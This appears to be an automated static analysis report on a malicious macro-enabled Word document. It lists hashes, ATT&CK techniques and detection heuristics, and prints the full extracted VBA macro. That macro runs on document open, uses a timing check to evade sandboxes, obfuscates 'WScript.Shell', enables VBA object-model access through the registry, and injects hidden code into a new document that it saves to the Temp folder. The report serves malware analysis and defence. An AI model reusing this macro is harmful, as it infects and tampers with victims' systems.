Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 06e4084e2d043f21…

MALICIOUS

Office (OOXML) / .DOC

65.7 KB Created: 2024-08-27 14:45:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-13
MD5: 3d33ac05d0ca473518c784c37bc887a9 SHA-1: 8071b87ab3307a907052abce7092c4f5605e4ae3 SHA-256: 06e4084e2d043f216c0bc7931781ce3e1cea4eca1b6092c0e34b01a89e2a6dea
178 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1204.002 Malicious File

The sample contains VBA macros that execute upon opening the document, as indicated by the 'documeNt_opEn' subroutine. The macro constructs a string 'WScript.Shell' to create a Windows Script Host object, which is then used to write a value to the registry key HKCU\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM. This action likely aims to enable programmatic access to the VBA object model, potentially to facilitate further malicious actions or persistence. The macro also attempts to save the document and then opens a new document, suggesting a downloader or dropper functionality.

Heuristics 7

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
            Set wsl = CreateObject(strng)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub documeNt_opEn()
  • External hyperlinks (2) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: mailto:m.madelkhanov@mfa.kz
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Document hyperlink
    • http://schemas.microsoft.com/office/drawing/2014/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexDocument hyperlink
    • http://schemas.openxmlformats.org/markup-compatibility/2006Document hyperlink
    • http://schemas.microsoft.com/office/drawing/2016/inkDocument hyperlink
    • http://schemas.microsoft.com/office/drawing/2017/model3dDocument hyperlink
    • http://schemas.microsoft.com/office/2019/extlstDocument hyperlink
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsDocument hyperlink
    • http://schemas.openxmlformats.org/officeDocument/2006/mathDocument hyperlink
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingDocument hyperlink
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingDocument hyperlink
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainDocument hyperlink
    • http://schemas.microsoft.com/office/word/2010/wordmlDocument hyperlink
    • http://schemas.microsoft.com/office/word/2012/wordmlDocument hyperlink
    • http://schemas.microsoft.com/office/word/2018/wordml/cexDocument hyperlink
    • http://schemas.microsoft.com/office/word/2016/wordml/cidDocument hyperlink
    • http://schemas.microsoft.com/office/word/2018/wordmlDocument hyperlink
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duDocument hyperlink
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashDocument hyperlink
    • http://schemas.microsoft.com/office/word/2015/wordml/symexDocument hyperlink
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupDocument hyperlink
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkDocument hyperlink
    • http://schemas.microsoft.com/office/word/2006/wordmlDocument hyperlink
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeDocument hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1974 bytes
SHA-256: cab6f078d1ea32030ccaca88a921f8f4c4080728d12ffb69057d8383fa7fa431
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
        danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
        Set doc2 = objApp.Documents.Open(namedoc)
    doc2.Save
    doc2.Close
End Function
Sub verydanger()
        strng = "WSc" & "ript.She"
        strng = strng & "ll"
        Set wsl = CreateObject(strng)
        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
    On Error Resume Next
        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                ActiveDocument.Shapes(i).Delete
        Next i
    ActiveDocument.Save
        sss = Now()
    While Now < sss + TimeValue("00:00:20")
        DoEvents
    Wend
        If Now() - sss < TimeValue("00:00:15") Then Exit Sub
        verydanger
    Set objApp = CreateObject("Word.Application")
    objApp.Visible = False
    Set doc = objApp.Documents.Add
    For Each vars In ActiveDocument.Variables
    doc.Variables.Add vars.Name & "ergegdr", vars
    i = i + 1
    Next
    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
    doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
    doc.Close
        rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
        objApp.Quit False
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 22016 bytes
SHA-256: e917622d343402cf0f558450f25e45658228bdeef0ff4e56f2dea08140afbc1b